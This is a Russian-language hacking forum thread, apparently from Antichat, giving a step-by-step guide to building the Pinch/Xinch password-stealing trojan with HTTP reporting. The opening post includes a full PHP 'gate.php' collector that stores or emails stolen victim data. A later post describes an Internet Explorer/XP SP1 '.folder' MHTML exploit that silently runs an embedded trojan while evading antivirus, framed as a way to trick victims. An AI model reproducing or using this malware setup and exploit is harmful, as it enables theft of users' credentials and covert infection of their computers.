|
Faq по трою(как его сделать на http)
Привет всем !
Сейчас я хочу вам рассказать чему я научился на ачате Я научился комплить троя для угона аси через http сейчас я вам расскажу как это сделать: Что на нужно: 1)Это сам троян пинч\ксинч(но я предпочитаю ксинч) можете скачатьотсюда 2)Это сайт поддержкой php возьмем к примеру www.holm.ru 3)gate.php скачайте этот :) 4)Это TotalCmd и желательно Руссификатор После активации сайта вам прийдет письмо с настройками фтп это примерно будет выглядить так Server:xaknyacu.h17.ru login:xaknyacu7 Password:ErqWEDfs Потом через Total Commander подключаемся к нашему сайту. Мы на фтп! Идем в папку WWW и создаем там любую дирректорию. Я создал passi. Далее заходим в папку и вставляем туда gate.php Потом открываем gate.php это так: <? //CFG $mode = 2; //1.Send to e-mail, 2.Save to file, 3.E-mail+file $rndatch = FALSE; //Random reports names $savetodir = TRUE; //Save rerorts to changed directory $dirname = "сюда мы пишим ту папку куда будут приходить пароль это (otcheti)"; //Directory name // a - recepient // b - subject // c - message body // d - file name(not *.php) //Getting data $ip=getenv("REMOTE_ADDR"); $email=$_POST['a']; $subject=$_POST['b']."(".$ip.")"; $msg = str_replace(" ","+",$_POST['c']); $var = $_POST['d']; //Storing || Sending data //via E-Mail IF($mode == 1 || $mode == 3){ IF($rndatch){ $array = range('a','z'); $c=count($array); $var = $array[rand(1,$c)] . $array[rand(1,$c)] . $array[rand(1,$c)] . $array[rand(1,$c)] . rand(0,9) . rand(0,9) . ".bin"; }; $headers = "Content-Type: application/octet-stream; name=\"".$var."\"\n"; $headers.= "Content-Transfer-Encoding: base64\n"; $headers.= "Content-Disposition: attachment; filename=\"".$var."\"\n"; mail($email, $subject, $msg, $headers); }; //via File IF($mode == 2 || $mode == 3){ //To dir IF($savetodir){ @mkdir($dirname); @chdir($dirname); } $vartype=substr($var,-3,3); IF($vartype == "php") $var.=".saf"; $filename = date('H_i-d.m.Y',time()+3600*6)."_".$ip."_".$var; $fp=fopen($filename,'w'); fwrite($fp, base64_decode($msg)); fclose($fp); }; ?> <title>ret_ok</title> Работа на фтп закончена! Затем запускаем билдер пинча\хинча. И создаем вирус указав во складке http в форме URL адрес до gate.php! Это будет где-то как http://xaknyacu.h17.ru/passi/gate.php и ставим галку в поле http и Комплим вирус Для открытия отчётов на понадобится passer Вот и всё! |
Цитата:
Статейка не чего... но + ща не поставлю... |
Очень полезная статейка!!Ужо себе сохранила!=)
КАк токо экзамены кончатся....буду читать твою и devil2007 статьи по троянам))))хыы))) |
опять.. сколько можно долбить одну и ту же тему.
Уже наверное сотни статей о настройки пинча) )) |
Enk0r
Тем куча насчет этого,но не все статьи продвигаются....и не все их замечают))) |
http://forum.antichat.ru/showthread.php?p=241888
http://forum.antichat.ru/thread19273-%ED%E0%F1%F2%F0%EE%E9%EA%E0+%EF%E8%ED%F7%E0.html http://forum.antichat.ru/thread14387-%ED%E0%F1%F2%F0%EE%E9%EA%E0+%EF%E8%ED%F7%E0.html http://forum.antichat.ru/thread14180-%ED%E0%F1%F2%F0%EE%E9%EA%E0+%EF%E8%ED%F7%E0.html http://forum.antichat.ru/thread25177-pinch.html http://forum.antichat.ru/thread24528-pinch.html http://forum.antichat.ru/thread27162-pinch.html http://forum.antichat.ru/thread24564-pinch.html http://forum.zloy.org/showthread.php?t=7844&highlight=%ED%E0%F1%F2%F0%EE %E9%EA%E0+%EF%E8%ED%F7%E0 Кто ищёт тот всегда найдёт))) |
Enk0r
Ого!!Ну ты гониш!!! =) А как быстро то!!Нам на ачате нужно создать раздел.."Секретарь" или "Справочная" и так как ты оч быстро все ищеш...посадить за главноО!!Все кому что нужно будут обращатся к тебе...а ты будеш шарится по всему ачату и с такой же скоростью находить все все линки на эту тему!;))) |
неплохо)
|
Цитата:
Для интереса просмотрел другие форумы схожей тематики, надо сказать Античат бьёт все рекорды. Не на одном форуме нет такого количества топиков о пинче.. мда)) /me пошёл писать ещё одну статью о настройке пинча.. ждите. |
Enk0r
А главное Античат бьет рекорды по проценты схожих тем!!Ни у кого еще нету...штук 20 созданых топов по одному и тому же)))Ачат рул!!))) А насчет идеи...ну так вот..ты будеш секретарем...а я твоей помошницей;)))))70 % я беру себе от дохода :р |
Пассер архив битый!!!
|
Это чисто для новичков!!! Но на форуме есть подобные статьи! Нового сдесь нечего нет.
|
Тема наз. Faq по трою тогда надо было полностью написать про настройку троя, а не выборочно http. Вот хороший пример:
Цитата:
|
ля скоко можно?)))
надо и мне подобную статейку написать |
По поводу Пассера
Пассер вместе с ксинчем |
моодец статья получилась ничего
|
мдя... статей дофига... вбил в том же гугле пару вопросов:
Настройка pinch гейты для pinch получил целую энциклопедию ) |
у меня Ксинч не компилится....чего делать?
|
Цитата:
--- Короче: 1)Отключи все антивирусы и прочую гадость. 2)Не ставь галки на: Криптовать, проверь стоит у тебя галка на ICO. (PINCH) Если да укажи иконку (в xinch ваще отключи) 3)Ставь все галки |
дайте рабочую сцыль на гейт
|
Друзья! Кто-нибудь слышал о Смертельном скрипте? Прикольная фишка!!! Pinch скрывает напрочть от любых антивирей! Правда одно но... скрипт использует дыру в SP1. Так ыто если на компе жертвы именно он то надо юзать! Кого заинтересовало отпишитесь, расскажу;)
|
Цитата:
|
Итак смертельный скрипт: (правда тема старая. Идея nsd):
Повторяю еще раз - сей трюк прокатит только на SP1. Идея состоит вот в чем: если воспользоваться расширением .folder в SP1 то файл отображается как обыкновенная папка! При ее открытии специально подготовленный javascript (надо использовать бреш ослика) запускает тело троя! Причем на эту папку не гавкает антивирус. Сейчас я подробно расскажу как это сделать... Сперва создаем текстовый документ, назавем его photo.txt. Далее открываем его в текстовом редакторе и прописываем тэги: <html> </html> Сохраняем. Теперь меняем рассширение файла с .txt на .folder и вуоля! Наш файл файл превращается в папку (в псевдопапку) Попробуем его открыть...О! открывается в IE. Теперь необходимо подготовить javascript. Возвращаем нашему файлу былую форму-меняем расширение обратно на .txt и помещаем туда следующий скрипт: <html>//уже прописан MIME-Version: 1.0 Content-Location:trojan.exe Content-Transfer-Encoding: mac-binhex40 //сюда мы поместим тело троя в HQX формате(чуть позже как это сделать...) <title>|</title> <body bgcolor=blue scroll=no> <SCRIPT> function zoh(){ z = document.URL; p = z.substr(-0,z.lastIndexOf("\\")); p = unescape(p) document.write( '<title></title><body scroll=no bgcolor=#000000> //здесь оставляем пару комментариев жертве на ваш выбор. Можно, например: Кердык тебе!!!! <object classid="clsid:77777777-7777-7777-7777" codebase="mhtml:'+p+'\\1.folder!trojan.exe" width=1 height=1></object>'); } // это для того, чтобы обмануть AVP document.write(''); setTimeout("zoh()",0); </script> </html> Все наш javascript готов! Теперь надо скомпилировать трой, к примеру Pinch v 1.0. Ну думаю тут проблем не будет, так как там на первых страницах уже все есть. Итак скомпилировали...(правда я не пробовал через http, делал через smtp). Так...далее нам понадобиться утилита binhex, которую можно взять http//www.aladin88.jino-net.ru/tools/binhex.rar Распаковываем и закидываем её в папку где лежит трой Pinch. Запускаем binhex выбираем нашего трояна (как вы его там назвали) и нажимаем F2. В результате получаем трояна в формате HQX. Открываем его в блокноте и копируем все содержимое (да эти непонятные символы!) и вставляем в скрипт(вместо коменнтария). Теперь сожраняем и меняем расширение на .folder. Всё наше творение готово! Теперь с улыбкой впариваем его ламеру --------------------------------------------- Плз, оцените статью:) |
у меня проблемка...
итак.. полюзуюсь пинч3 от васьки, хост h18.ru, для управления хостом - SmartFTP ето мой гейт: PHP код:
ТУТ - скрин Билдера отчети не идут, ненаю что не так.....(перечитал уже наверно все стати рунета по настройке пинча) антивирус отключен, Билдер через на два мыла работает отлично.. помогите плиз |
Напишите настройку пинча и что где вписывать в gate.php! Или сделайте лучше видео как на хост заливать!
|
| Время: 09:52 |